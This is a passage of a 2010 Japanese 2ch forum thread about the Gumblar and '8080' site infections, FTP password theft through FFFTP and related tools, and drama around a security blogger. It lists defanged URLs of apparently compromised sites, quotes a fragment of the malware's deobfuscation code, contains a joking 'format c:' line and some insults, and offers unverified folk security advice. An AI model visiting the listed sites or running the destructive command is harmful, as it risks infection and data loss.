ttp://sunagawa-cci●com/index●html
大阪府中小企業団体中央会
ttp://www●maido●or●jp/index0●html
どれもevalつき
0310名無しさん@お腹いっぱい。
2010/01/31(日) 03:15:11たんにマイナーだから狙われないだけ
もしFedra+FirefoxがWindows+IEなみに普及してたらターゲットにされて攻撃されまくる
0311名無しさん@お腹いっぱい。
2010/01/31(日) 03:21:14弄られる前にサイトを閉じる
0312名無しさん@お腹いっぱい。
2010/01/31(日) 03:24:47Gentooだろ常識的に考えて
0313へたれ発掘屋
2010/01/31(日) 04:07:17サイト名省略w(きっと最新型)
tp://www●3renshinan●com/
最新型の検出状況
http://www.virustotal.com/analisis/103d463d367bd9f68b9bcf93ed1ae58f0ca4debe38213bdcf70536a2f713e412-1264873639
0315名無しさん@お腹いっぱい。
2010/01/31(日) 10:04:56イマイさんにリダイヤル攻撃されるんですね
0316名無しさん@お腹いっぱい。
2010/01/31(日) 10:14:11詳細はWikipediaの編集履歴を参照
0317名無しさん@お腹いっぱい。
2010/01/31(日) 10:55:210318名無しさん@お腹いっぱい。
2010/01/31(日) 11:45:05辞めてほしくないなあ
0319名無しさん@お腹いっぱい。
2010/01/31(日) 12:00:52普段あまり頼りにならんけど、8080引っかけたい人はどうぞ。
ttp://drweb.jp/support/link_checker.html
0320名無しさん@お腹いっぱい。
2010/01/31(日) 12:02:52じゃあ業務停止命令されなきゃな
やはりGENOが去年からのウイルス騒動の元凶じゃないのか?
ガンブラー系や8080系作ったのもそいつらだって疑われて当たり前だ
0321geno
2010/01/31(日) 12:04:06してるなら乗り換えたいな
0322名無しさん@お腹いっぱい。
2010/01/31(日) 12:32:56ボランティアでやってるのにここまで求められちゃかなわん、と
ふくれているのかもしれんが、
「当該記事の修正を迫」った人への執拗なまでの当てこすりといい
「みんな助かってます、どうか止めないでください」との声が上がることを
期待しているかのようなあざとい誘い受けといい、ガキかよ、と。
そんなにやってらんないんなら止めりゃいいのに。誰も頼まないから。
0323名無しさん@お腹いっぱい。
2010/01/31(日) 12:38:26最近の一般ユーザーはマジキチ
0324名無しさん@お腹いっぱい。
2010/01/31(日) 12:41:050325名無しさん@お腹いっぱい。
2010/01/31(日) 12:42:47それとも第三者なのか
0326名無しさん@お腹いっぱい。
2010/01/31(日) 12:44:280327名無しさん@お腹いっぱい。
2010/01/31(日) 12:46:37当て擦りっていうの?
あのしつこくてくどい皮肉めいた書きぶりは
ちょっと大人気ないわ
頭冷やして、このまま続けてくれとは思うけど
0328名無しさん@お腹いっぱい。
2010/01/31(日) 12:47:33いやあ俺は助かってるからさ
そんなあてこすりは眼中にはいらないほど助かってるから
サイト持ってるから気持ちわかるところもあるし
彼の文体も好きなんだよね
0329名無しさん@お腹いっぱい。
2010/01/31(日) 12:48:29gnomeさんとこ。
なんか誤解を与えかねない(?)記事があってクレームがきたみたい。
0330名無しさん@お腹いっぱい。
2010/01/31(日) 12:51:03第三者だろ、曽田さんはそこまで暇じゃない
0331名無しさん@お腹いっぱい。
2010/01/31(日) 12:52:29d。
0332名無しさん@お腹いっぱい。
2010/01/31(日) 12:55:210333名無しさん@お腹いっぱい。
2010/01/31(日) 12:59:45だとしたら、それこそ「誤解を招く表現」だと思うんだけど
あれだと普通にSota氏から抗議がきたように読めちゃうんだが
0334名無しさん@お腹いっぱい。
2010/01/31(日) 13:01:09お前みたいな反応をかえすやつといちいち付き合ってられん。
0335名無しさん@お腹いっぱい。
2010/01/31(日) 13:02:180336名無しさん@お腹いっぱい。
2010/01/31(日) 13:02:210337名無しさん@お腹いっぱい。
2010/01/31(日) 13:07:20ただ、あそこで誤解を招く表現の上塗りしちゃってどうすんの?と
俺がSota氏だったらああいう書かれ方はちょっと迷惑かなぁ、と
今まさにそういう煩わしさに巻き込まれているGnome氏なんだから
余計慎重になってほしかったな、と
0338名無しさん@お腹いっぱい。
2010/01/31(日) 13:07:260339名無しさん@お腹いっぱい。
2010/01/31(日) 13:09:02雑音って一度気にし始めるともうだめなんだよ
そればかりが気になってしょうがなくなる
どんな人でもそう
やめるやめないは本人の好きにすればいいが、お前のそのコメントはだめだな
こんなところでぬるま湯につかってるんだから
0340名無しさん@お腹いっぱい。
2010/01/31(日) 13:10:02迷惑も何も本人はブログ以外ほとんどやってないんだから、迷惑もくそもないだろう
0341名無しさん@お腹いっぱい。
2010/01/31(日) 13:12:300342名無しさん@お腹いっぱい。
2010/01/31(日) 13:12:41企業や報道機関が無知でいい加減な報道しても放置状態なのに
0343名無しさん@お腹いっぱい。
2010/01/31(日) 13:14:330344名無しさん@お腹いっぱい。
2010/01/31(日) 13:14:530345名無しさん@お腹いっぱい。
2010/01/31(日) 13:16:180346名無しさん@お腹いっぱい。
2010/01/31(日) 13:17:07俺かっこいいとか
0347名無しさん@お腹いっぱい。
2010/01/31(日) 13:20:40スレッドとか立ったなかった?
文章を一部抽出したような内容で。
0348名無しさん@お腹いっぱい。
2010/01/31(日) 13:25:20中途半端に引用された文章にくいついて盛り上がってた
0349名無しさん@お腹いっぱい。
2010/01/31(日) 13:31:02どこかで「FFFTPは危険!」みたいな注意喚起スレが立って、
gnome氏の記事が(氏の意図にそぐわない形で)部分引用された
↓
gnome氏の「FFFTP自体がマルウェア」とでも言いたげな記事を読んだ
(そう誤解した)第三者が
「FFFTP自体は悪くないだろ!記事を書き直せ!」とブログに凸した
↓
gnome氏、「お詫び」という形で、ささやかな反論
みたいな流れ?(んで、FFFTP作者のSota氏はこの件に絡んでいない)
0350名無しさん@お腹いっぱい。
2010/01/31(日) 13:32:340351名無しさん@お腹いっぱい。
2010/01/31(日) 13:34:28終了!
0352名無しさん@お腹いっぱい。
2010/01/31(日) 13:37:260353名無しさん@お腹いっぱい。
2010/01/31(日) 13:47:31そうか?
それだけは無いなと読めたが
0354名無しさん@お腹いっぱい。
2010/01/31(日) 13:51:470355名無しさん@お腹いっぱい。
2010/01/31(日) 13:56:560356名無しさん@お腹いっぱい。
2010/01/31(日) 13:57:25このスレにもいるし
初期の頃から分かってることだがその他のFTPクライアントも同様なのに
0357名無しさん@お腹いっぱい。
2010/01/31(日) 13:58:210358名無しさん@お腹いっぱい。
2010/01/31(日) 13:58:280359名無しさん@お腹いっぱい。
2010/01/31(日) 14:01:47記憶したパスワードが盗まれる対象のソフトを複数あげてたな
サイトアドレスは記憶にないけど
0360名無しさん@お腹いっぱい。
2010/01/31(日) 14:12:000361名無しさん@お腹いっぱい。
2010/01/31(日) 14:17:31自分のサイトはヤフージオシティーズが提供している
ジオクリエーターで製作しているんだけど、
こういうタイプのサイトもGumblarや8080系のウイルスによって
改ざんされる事あるんですか?
アレ、PCから直接HTMLファイルや画像ファイルが開けて便利なんですけど
とっても心配です。
ちなみに使用ブラウザはIE8
アドビリーダーもフラッシュも最新版に更新済み
(Javaスクリプトはリーダーのみ切っている
IEはお絵かき掲示板使用の為切っていない)
0362名無しさん@お腹いっぱい。
2010/01/31(日) 14:21:030363名無しさん@お腹いっぱい。
2010/01/31(日) 14:21:410364名無しさん@お腹いっぱい。
2010/01/31(日) 14:24:290365名無しさん@お腹いっぱい。
2010/01/31(日) 14:28:090366名無しさん@お腹いっぱい。
2010/01/31(日) 14:33:100367名無しさん@お腹いっぱい。
2010/01/31(日) 14:33:18ああいう口調や文体を使うってことは、そのあたりに相応の自負があってのものだと思っていたよ。
0368名無しさん@お腹いっぱい。
2010/01/31(日) 14:37:48それはちょっと思った
本人が想定してたより,あのブログの影響力が大きくなりすぎてたのかもね
0369名無しさん@お腹いっぱい。
2010/01/31(日) 14:38:400370名無しさん@お腹いっぱい。
2010/01/31(日) 14:44:17ワロタww
0371名無しさん@お腹いっぱい。
2010/01/31(日) 14:51:56どうも初めてではないみたいだしな
耐性つくか脆くなるかで、Gnomeは後者なんだろう
ここは生ぬるく見守ろうぜ
0372名無しさん@お腹いっぱい。
2010/01/31(日) 15:00:51ttp://hobby-channel.net/index.php
見れないんだが
0373名無しさん@お腹いっぱい。
2010/01/31(日) 15:07:530374名無しさん@お腹いっぱい。
2010/01/31(日) 15:08:06毎度毎度大変だよな
0375名無しさん@お腹いっぱい。
2010/01/31(日) 15:09:17Nifty感染疑惑の時かな
0376名無しさん@お腹いっぱい。
2010/01/31(日) 15:09:54そうでしたか、すみません。
0377名無しさん@お腹いっぱい。
2010/01/31(日) 15:19:470378名無しさん@お腹いっぱい。
2010/01/31(日) 15:22:170379名無しさん@お腹いっぱい。
2010/01/31(日) 15:23:080380名無しさん@お腹いっぱい。
2010/01/31(日) 15:24:110381名無しさん@お腹いっぱい。
2010/01/31(日) 15:29:160382名無しさん@お腹いっぱい。
2010/01/31(日) 15:43:180383名無しさん@お腹いっぱい。
2010/01/31(日) 15:45:510384名無しさん@お腹いっぱい。
2010/01/31(日) 15:46:55これもウイルスのせいか…
0385名無しさん@お腹いっぱい。
2010/01/31(日) 15:52:02有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
0386名無しさん@お腹いっぱい。
2010/01/31(日) 15:55:520387名無しさん@お腹いっぱい。
2010/01/31(日) 15:56:520388名無しさん@お腹いっぱい。
2010/01/31(日) 16:00:19自分もなんだか心配だ
0389名無しさん@お腹いっぱい。
2010/01/31(日) 16:00:43ボランティアなのに、有り難いことだ
0390名無しさん@お腹いっぱい。
2010/01/31(日) 16:02:07他の使っといたらいいよ。
0391名無しさん@お腹いっぱい。
2010/01/31(日) 16:03:37オープンソースの強みだな
もう乗り換えちゃったけど
0392名無しさん@お腹いっぱい。
2010/01/31(日) 16:04:26そういうところもあるだろうし
違うところもあるだろう
0393名無しさん@お腹いっぱい。
2010/01/31(日) 16:06:21強みでもあり、解析されるという弱みでもあり…ホント諸刃の剣だな
例のブログ、お詫び記事がお詫び記事に見えない件
0394名無しさん@お腹いっぱい。
2010/01/31(日) 16:11:56Sota かわいそす
ってか FTPソフト 乗り換えるべきなんでしょうか?
0395名無しさん@お腹いっぱい。
2010/01/31(日) 16:12:35何使ってもやられるから気にすんな
0396名無しさん@お腹いっぱい。
2010/01/31(日) 16:14:58乗り換えるべき
>>395
そんなことないね。
0397名無しさん@お腹いっぱい。
2010/01/31(日) 16:16:020398名無しさん@お腹いっぱい。
2010/01/31(日) 16:17:300399名無しさん@お腹いっぱい。
2010/01/31(日) 16:19:06その前にちゃんと対策すれば大丈夫
0400名無しさん@お腹いっぱい。
2010/01/31(日) 16:23:11心配ならOSをMacかLinuxに変えれ
Windows由来の脆弱性は突かれないから
0401名無しさん@お腹いっぱい。
2010/01/31(日) 16:25:25ソースコードは公開してるので気が向いた人はそのまま使うなり改造するなりして使ってください、著作権は放棄しています
ttp://www.dotup.org/uploda/www.dotup.org610235.rar.html
0403名無しさん@お腹いっぱい。
2010/01/31(日) 16:46:590404名無しさん@お腹いっぱい。
2010/01/31(日) 16:47:21今までありがと。
0405名無しさん@お腹いっぱい。
2010/01/31(日) 16:47:330406名無しさん@お腹いっぱい。
2010/01/31(日) 16:49:31え?理由はよくわからないけど、感染してたの?
理由教えてほしいな・・・他の人も使ってただろうし・・・
0407名無しさん@お腹いっぱい。
2010/01/31(日) 16:54:27プラグインでまだサポートのあるのは最新に
その他ははアンインスコ
ルータ噛ます
ブラウザは最新版でいまだに使えるOPERA10.10にする……とかかなぁ
そもそもこのスレで話題の奴は9xで感染拡大するのかわからんけど
0408名無しさん@お腹いっぱい。
2010/01/31(日) 16:56:20さっぱり分からん。
0409名無しさん@お腹いっぱい。
2010/01/31(日) 16:58:49ありがとう
0410名無しさん@お腹いっぱい。
2010/01/31(日) 16:59:35http://mag.matrix.jp/mag/queen/log/soft/eid743.html
この仕方がいまいち解らないんだけど
ソースとバイナリってのをFFFTPのフォルダーに入れるの?
誰か説明して下さい
お願いします。
やり方を1から10までお願いします。
0411名無しさん@お腹いっぱい。
2010/01/31(日) 17:02:21甘え過ぎだろw
0412名無しさん@お腹いっぱい。
2010/01/31(日) 17:03:030413名無しさん@お腹いっぱい。
2010/01/31(日) 17:03:07JavaScriptやcookieが不必要で使い勝手が良く、重宝しておりました。
いままで利用させていただき、大変ありがとうございました。
これからはaguse.jp使うしかないか。
0414名無しさん@お腹いっぱい。
2010/01/31(日) 17:06:05違いますよ FFFTPを配布してるサイトのリンク先です><
http://www2.biglobe.ne.jp/~sota/
[2010/1/31]
有志の手により、パスワード漏れ対策版のFFFTPが公開されました。
マスターパスワードを使用することにより、FFFTPにパスワードを記憶させた時の安全性が向上しています。
以下のサイトです。改良&公開ありがとうございます。
にょろぷにらん・FFFTPパスワード漏れ対処版作ってみた
http://mag.matrix.jp/mag/queen/log/soft/eid743.html
0415名無しさん@お腹いっぱい。
2010/01/31(日) 17:07:190416名無しさん@お腹いっぱい。
2010/01/31(日) 17:12:56バーカバーカ
0417名無しさん@お腹いっぱい。
2010/01/31(日) 17:13:010418名無しさん@お腹いっぱい。
2010/01/31(日) 17:13:54本当に解らないんです><
0419名無しさん@お腹いっぱい。
2010/01/31(日) 17:15:080420名無しさん@お腹いっぱい。
2010/01/31(日) 17:16:454までで十分
0421名無しさん@お腹いっぱい。
2010/01/31(日) 17:16:46ソースってのは何処に入れるんですか?><
要らないファイルなんですか?><
0422名無しさん@お腹いっぱい。
2010/01/31(日) 17:17:09【初心者歓迎】FFFTPについてのスレ2発目
http://pc12.2ch.net/test/read.cgi/software/1218020216/
0423412
2010/01/31(日) 17:19:07すいませんでした
0424名無しさん@お腹いっぱい。
2010/01/31(日) 17:19:200425名無しさん@お腹いっぱい。
2010/01/31(日) 17:19:46みんな誤検出しないように。
0426名無しさん@お腹いっぱい。
2010/01/31(日) 17:20:210427名無しさん@お腹いっぱい。
2010/01/31(日) 17:29:23感染サイト減ったほうがいいだろ
0、念のためバックアップをとる
1、FFFTPを入れ替える
2、ショートカットのプロパティのリンク先のところで
"C:\Program Files\ffftp\FFFTP.exe"
↓
"C:\Program Files\ffftp\FFFTP.exe" -z おまいの好きなパスワード ←これがマスターパスワード
と後ろに付け加える
3、起動すると正しいパスワードを聞いてくるので今まで設定していたパスワードをそのまま入力
0428名無しさん@お腹いっぱい。
2010/01/31(日) 17:31:59メンテナンスされないプログラムなんて危険だらけ
0429名無しさん@お腹いっぱい。
2010/01/31(日) 17:34:32GumblarのたぐいがOffice Web コンポーネントの脆弱性も使ってるようだから、
Office2000を使ってる場合は手動で更新する必要がある。
0430名無しさん@お腹いっぱい。
2010/01/31(日) 17:35:26どこにの乗り換えればいいのやら
0431名無しさん@お腹いっぱい。
2010/01/31(日) 17:36:510432名無しさん@お腹いっぱい。
2010/01/31(日) 17:40:05その設定に疑問があるんですが
ショートカット使ってない場合はどうなるんでしょうか?><
0433名無しさん@お腹いっぱい。
2010/01/31(日) 17:41:580434名無しさん@お腹いっぱい。
2010/01/31(日) 17:42:00そのうち改造してみよう
http://gumblar.moepla.net/
0435名無しさん@お腹いっぱい。
2010/01/31(日) 17:44:47また感染広げるんですか^^;
0436名無しさん@お腹いっぱい。
2010/01/31(日) 17:45:58ちゃんと経緯説明して謝罪しろよ
GENO社員かよwwww
0437名無しさん@お腹いっぱい。
2010/01/31(日) 17:47:24どういうこと?
0438名無しさん@お腹いっぱい。
2010/01/31(日) 17:49:23放棄しちゃったのか。。。
0439名無しさん@お腹いっぱい。
2010/01/31(日) 17:50:54何があったのよ?
あなたのおかげで1つのHPが助かったというのに。
0440名無しさん@お腹いっぱい。
2010/01/31(日) 17:50:55拡張子変更みたいになって良く解りませんでした><
0441名無しさん@お腹いっぱい。
2010/01/31(日) 17:51:540442名無しさん@お腹いっぱい。
2010/01/31(日) 17:52:51死ねよカス
0444名無しさん@お腹いっぱい。
2010/01/31(日) 17:56:23金wwww
0445名無しさん@お腹いっぱい。
2010/01/31(日) 17:56:530446名無しさん@お腹いっぱい。
2010/01/31(日) 17:56:57ショートカット作ればいいだろ
いちいいち本体から実行してるのかよw
0447名無しさん@お腹いっぱい。
2010/01/31(日) 17:58:030448名無しさん@お腹いっぱい。
2010/01/31(日) 17:58:320449名無しさん@お腹いっぱい。
2010/01/31(日) 17:58:43まあなんだ…変にはぐらかすから変な奴に粘着される流れになってる訳で、最初からそう言っときゃ良かったのにね…
>>445
そういや昨日、FFFTP関連とか言って感染ページのURL貼っていった馬鹿もこの時間帯じゃなかったっけ?
0450名無しさん@お腹いっぱい。
2010/01/31(日) 17:59:47広告付ければ良かったのに。。。
>>434みたいに(笑)
0451名無しさん@お腹いっぱい。
2010/01/31(日) 18:00:19自動挿入の
0452名無しさん@お腹いっぱい。
2010/01/31(日) 18:00:41でも、まあ、金払ってなかったからっつーのも恥かしいから言いたくないのもわかる
何から何まで求めすぎのモンスター化しとるぞ
0453名無しさん@お腹いっぱい。
2010/01/31(日) 18:00:54ショートカットに鍵かけても直接だと起動するって意味があるんですか><
ショートカットに鍵もかからないけど><
0454名無しさん@お腹いっぱい。
2010/01/31(日) 18:01:36俺も仮鯖に置いてみた。
アドバイスよろ〜
0455名無しさん@お腹いっぱい。
2010/01/31(日) 18:02:20絶対に踏むな
0456名無しさん@お腹いっぱい。
2010/01/31(日) 18:02:43はい><
0457名無しさん@お腹いっぱい。
2010/01/31(日) 18:03:01外野があんまりアフィアフィ嫌儲に走るからこうなるんだ
0458名無しさん@お腹いっぱい。
2010/01/31(日) 18:03:29甘やかすから居座る
0459名無しさん@お腹いっぱい。
2010/01/31(日) 18:03:32なら最初から金策すればよかったのにね
あとからどうやこうやってのは変な目で見られると思うよ。
0460名無しさん@お腹いっぱい。
2010/01/31(日) 18:04:070461名無しさん@お腹いっぱい。
2010/01/31(日) 18:04:44はいはい感染サイトなんで踏むの厳禁
aguseリニューアルされてカスペの検出可否に関係なくGumblar判定出してくれるようになったのは嬉しいところ
どこまで変化してるスクリプト追えるのかは分からんが
0462名無しさん@お腹いっぱい。
2010/01/31(日) 18:04:59うるせーな
じゃあお前がやれよ
最後まで責任とれってか
金もださずにごちゃごちゃ師ね
0463名無しさん@お腹いっぱい。
2010/01/31(日) 18:05:02馬鹿かもう飽きたわ。
0464名無しさん@お腹いっぱい。
2010/01/31(日) 18:05:35.replace(/\^|@|\!|&|\)|#|\$|\(/ig, '')...がうんたらかんたら
0465名無しさん@お腹いっぱい。
2010/01/31(日) 18:06:43なら、あなたがやればいいんじゃないでしょうか?(笑)
0466名無しさん@お腹いっぱい。
2010/01/31(日) 18:07:250467名無しさん@お腹いっぱい。
2010/01/31(日) 18:07:33広告ありの無料鯖はダメみたいなのでこっちにしました
0468名無しさん@お腹いっぱい。
2010/01/31(日) 18:08:11俺もそう思ったw
0469名無しさん@お腹いっぱい。
2010/01/31(日) 18:08:44お前なんでこんなとこにいんの?
0470名無しさん@お腹いっぱい。
2010/01/31(日) 18:09:17この人が犯人です><
0471名無しさん@お腹いっぱい。
2010/01/31(日) 18:09:33お前もなんでいんの?wwwwwwwwwwwwwww
乞食なの?wwwwwwwwwwwwwwwww
0472名無しさん@お腹いっぱい。
2010/01/31(日) 18:10:08進化は良いんだがJavaScriptを完全に有効にしなきゃいけなくなったところは残念。機能的に仕方ないんだろうけど
前のはJS切ってても必要最低限の機能は使えたから
まあGumblarチェッカーの選択肢増えたのは良いことだと思う
0473名無しさん@お腹いっぱい。
2010/01/31(日) 18:12:05ありがとう
0474名無しさん@お腹いっぱい。
2010/01/31(日) 18:13:43おまいには無理だ
ビルダーでも使ってアップしなさいw
0475名無しさん@お腹いっぱい。
2010/01/31(日) 18:14:03Good bye 0001
Thank you. Maybe, not be proxy...
0476名無しさん@お腹いっぱい。
2010/01/31(日) 18:14:49臭いから帰れよ
0477名無しさん@お腹いっぱい。
2010/01/31(日) 18:16:410478名無しさん@お腹いっぱい。
2010/01/31(日) 18:18:33Gumblarをめぐる人々の周辺に動きがあり過ぎて
なかなかカオスな一日でした。
0479名無しさん@お腹いっぱい。
2010/01/31(日) 18:19:30みんな無理って事じゃないですか><
0480名無しさん@お腹いっぱい。
2010/01/31(日) 18:20:40いったいどこでつまずいてんだよw
0481名無しさん@お腹いっぱい。
2010/01/31(日) 18:20:51ドンマイ。助かってたよ、今までお疲れさま。
なんなら募金したいくらいだわ。アフィとか自分は気にしないし。
0482名無しさん@お腹いっぱい。
2010/01/31(日) 18:21:18ネットってホントに怖いところですね…
0483名無しさん@お腹いっぱい。
2010/01/31(日) 18:21:19相手しちゃだめ
0484名無しさん@お腹いっぱい。
2010/01/31(日) 18:21:250485名無しさん@お腹いっぱい。
2010/01/31(日) 18:22:47/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン へいらっしゃい!!
i, ` ,、/ i_ `` ,r'
,r〃 'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
0486名無しさん@お腹いっぱい。
2010/01/31(日) 18:23:47ショートカット押したらユーザーアカウント制御って出て はい 押したらパス聞かないでFFFTPが開くんです><
0487名無しさん@お腹いっぱい。
2010/01/31(日) 18:24:04何らや、レスというか、書き込む人間自体が感染しているようで
廃人の並んでいる姿は、とても見応えがありましたね
0488名無しさん@お腹いっぱい。
2010/01/31(日) 18:24:390489名無しさん@お腹いっぱい。
2010/01/31(日) 18:24:54FFFTP以外にもSmartFTP、FileZilla、WinSCPのアカウント情報を盗みFTPサーバーへアクセスしてきます。
らしいbyTwitter
0490名無しさん@お腹いっぱい。
2010/01/31(日) 18:25:03この人も犯人です><
0491名無しさん@お腹いっぱい。
2010/01/31(日) 18:25:46FTP の危険性に関して超簡単まとめ | WWW WATCH
ttp://hyper-text.org/archives/2010/01/ftp_security.shtml
0492名無しさん@お腹いっぱい。
2010/01/31(日) 18:27:15日本人じゃないです
0493名無しさん@お腹いっぱい。
2010/01/31(日) 18:27:46鯖会社に今現在web上で起きている事と、
置いてるツールが何かを説明すれば・・・
鯖をタダで貸してくれるかもしれんよ。
FTPの話に夢中な奴ら>スレチだから他の板でやってくれ。
0494名無しさん@お腹いっぱい。
2010/01/31(日) 18:28:12ウイルス作成者と言うよりはネット上でしか威張れない荒らしが一番ほくそ笑んでるんじゃないの
人を混乱させてギスギスしているのを見て楽しむという非常に趣味の悪い人種
0495名無しさん@お腹いっぱい。
2010/01/31(日) 18:28:130496名無しさん@お腹いっぱい。
2010/01/31(日) 18:28:18使うなって書いてある><
0497名無しさん@お腹いっぱい。
2010/01/31(日) 18:28:53ユーザーアカウント制御がでるってことはあれだ
それ古いバージョンだから
今のFFFTPをアンインスコして新しいのをDLしてもう一度入れ直してから
対策版に入れ替えてみ
0498名無しさん@お腹いっぱい。
2010/01/31(日) 18:30:50鯖会社も慈善事業じゃないんだから…
そんなことしたら変に利益化しようとするかもしれんよ。ネットの無料サービスには裏に絶対何かある
0499名無しさん@お腹いっぱい。
2010/01/31(日) 18:31:04やってみます><
0500名無しさん@お腹いっぱい。
2010/01/31(日) 18:33:44>私はセキュリティの専門家ではありませんので
だめじゃんw
0501名無しさん@お腹いっぱい。
2010/01/31(日) 18:37:06あんたはセキュリティベンダーがアナウンスしたことしか信じないし、ベンダーが言ったことは100%信用するって人なのか
0502名無しさん@お腹いっぱい。
2010/01/31(日) 18:40:110503名無しさん@お腹いっぱい。
2010/01/31(日) 18:44:350504名無しさん@お腹いっぱい。
2010/01/31(日) 18:46:34同じでした駄目みたいです><
WIN7ではならないのかもしれません><
出来た人は教えて下さい><
ガンブラーはFFFTPを狙ったウィルスです
私はセキュリティの専門家ではありません
0505名無しさん@お腹いっぱい。
2010/01/31(日) 18:48:16ドンマイ!
0506名無しさん@お腹いっぱい。
2010/01/31(日) 18:49:55http://www.forest.impress.co.jp/article/2009/01/06/alftp.html
0507名無しさん@お腹いっぱい。
2010/01/31(日) 18:50:53GENOに感染してFFFTPのPASS変えてPCも買い換えて古いPCはGENOに感染したままで放置
がんばります><
0508名無しさん@お腹いっぱい。
2010/01/31(日) 18:54:01自分の個人ブログの中でまとめて、正直に「私はセキュリティの専門家でない。間違ってたり抜けてたら指摘してくれ」って言っただけでダメなのかよ
0509名無しさん@お腹いっぱい。
2010/01/31(日) 18:55:290510名無しさん@お腹いっぱい。
2010/01/31(日) 18:59:13おまえらコイかよww
0511名無しさん@お腹いっぱい。
2010/01/31(日) 19:04:010512名無しさん@お腹いっぱい。
2010/01/31(日) 19:07:52>>402 どうもありがとうでした
0513名無しさん@お腹いっぱい。
2010/01/31(日) 19:09:42遅まきながら今まで乙。お世話になりました。
0514名無しさん@お腹いっぱい。
2010/01/31(日) 19:13:49冷たい奴らだぜ
0515名無しさん@お腹いっぱい。
2010/01/31(日) 19:15:50aguseで検出できない
0516名無しさん@お腹いっぱい。
2010/01/31(日) 19:17:46>>467のだと反応するね
0517名無しさん@お腹いっぱい。
2010/01/31(日) 19:30:56aguseこっちは検出するなあ。同タイプのスクリプトなんだけど。
外部スクリプトファイルに反応してんのかな
0519名無しさん@お腹いっぱい。
2010/01/31(日) 19:56:00乙です
0520名無しさん@お腹いっぱい。
2010/01/31(日) 19:57:29凸完了
0521名無しさん@お腹いっぱい。
2010/01/31(日) 20:10:07乙です
0522名無しさん@お腹いっぱい。
2010/01/31(日) 20:15:28ttp://vidg5z.sa.yona.la/2759
>情報源が2Chかよ
0523名無しさん@お腹いっぱい。
2010/01/31(日) 20:19:10Adobeリーダー及びIEのJavascriptオフ、サイト・ブログ運営無しならGumblarに対する死角は無い・・・かな?
0524名無しさん@お腹いっぱい。
2010/01/31(日) 20:20:18WindowsUpdateじゃなくてMicrosoftUpdateにしてね
0525名無しさん@お腹いっぱい。
2010/01/31(日) 20:20:310526名無しさん@お腹いっぱい。
2010/01/31(日) 20:21:46引用元の人が怒ってくれてるから煽らんでよろしい
どう見てもそいつ中二病だし
0528名無しさん@お腹いっぱい。
2010/01/31(日) 20:25:240529名無しさん@お腹いっぱい。
2010/01/31(日) 20:26:41スポーツ系サイトとかどうだろう
0530名無しさん@お腹いっぱい。
2010/01/31(日) 20:28:220531名無しさん@お腹いっぱい。
2010/01/31(日) 20:29:34個人サイトとかはともかく
0532名無しさん@お腹いっぱい。
2010/01/31(日) 20:35:170533532
2010/01/31(日) 20:35:580534名無しさん@お腹いっぱい。
2010/01/31(日) 20:36:34だから、>>522のリンク先みたいな極論を語る奴は気違い扱いされる。
0535名無しさん@お腹いっぱい。
2010/01/31(日) 20:41:48ttp://t-tennis-web●hp●infoseek●co●jp/index●html
ttp://www●eonet●ne●jp/~kirameki-siga/index●htm
ttp://suemari●com/a/rakuten/index●js (駆除作業中?)
とりあえずURLだけですんません
0536名無しさん@お腹いっぱい。
2010/01/31(日) 20:48:26乙です
0537名無しさん@お腹いっぱい。
2010/01/31(日) 20:48:47なんか誤字だらけの文章なんだが、こいつは自分の書いたものを読み返す習慣がないのか?
0538名無しさん@お腹いっぱい。
2010/01/31(日) 20:49:590539名無しさん@お腹いっぱい。
2010/01/31(日) 20:56:19なんということでしょうw
0540名無しさん@お腹いっぱい。
2010/01/31(日) 21:06:42あまりにも執拗に正論を言うとき、人は裏側に嫉妬とコンプレックスが潜んでいます。
ttp://tamesue.cocolog-nifty.com/samurai/2010/01/post-6f11.html
0541名無しさん@お腹いっぱい。
2010/01/31(日) 21:21:220542名無しさん@お腹いっぱい。
2010/01/31(日) 21:27:19テキストエディタで眺める分には安全ですよね?
0543名無しさん@お腹いっぱい。
2010/01/31(日) 21:29:52このサイト開くと、まず1行目にジャバスクONしてくれって出てくるんだが
0544名無しさん@お腹いっぱい。
2010/01/31(日) 21:39:110545名無しさん@お腹いっぱい。
2010/01/31(日) 21:39:34telnetって平文だよね
安全とはいえないんじゃないかな
0546名無しさん@お腹いっぱい。
2010/01/31(日) 21:49:52janeの登録するためのリンク先教えてください
0547名無しさん@お腹いっぱい。
2010/01/31(日) 21:51:310548名無しさん@お腹いっぱい。
2010/01/31(日) 21:56:330549名無しさん@お腹いっぱい。
2010/01/31(日) 22:01:25エラーになる
皆使いすぎじゃね
0550名無しさん@お腹いっぱい。
2010/01/31(日) 22:04:050551名無しさん@お腹いっぱい。
2010/01/31(日) 22:09:47Js否定論者なのにONにしないと書き込めないとかどんだけ矛盾してるんだよって話しだよな
0552名無しさん@お腹いっぱい。
2010/01/31(日) 22:09:57行けるには行けるが、
「検出されたマルウェア」の項目が、
情報取得中のまま更新されねー。
0553名無しさん@お腹いっぱい。
2010/01/31(日) 22:17:380554名無しさん@お腹いっぱい。
2010/01/31(日) 22:21:56ありがとう、お疲れ様でした。
転送量オーバーで追加料金発生的な話?
0555名無しさん@お腹いっぱい。
2010/01/31(日) 22:22:330556名無しさん@お腹いっぱい。
2010/01/31(日) 22:24:08ゼロデイで攻撃されればなすすべがない。今回の教訓は正にこのことです。
0557名無しさん@お腹いっぱい。
2010/01/31(日) 22:33:220558名無しさん@お腹いっぱい。
2010/01/31(日) 22:40:25ひとつだけある。インターネットに繋がないこと。
0559名無しさん@お腹いっぱい。
2010/01/31(日) 22:41:55format c:
0560名無しさん@お腹いっぱい。
2010/01/31(日) 22:44:59LANケブールをハサミで切れば良いw
0561名無しさん@お腹いっぱい。
2010/01/31(日) 22:48:42―――――――――――――‐┬┘
| >>560
____.____ | .__ いらないPCを
| | | | |\_\ 窓から投げ捨てろ
| | ∧_∧ | | | |.◎.|
| |( ´∀`)つ ミ | | |.: |
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄ ̄
めるぽ
めるぽ
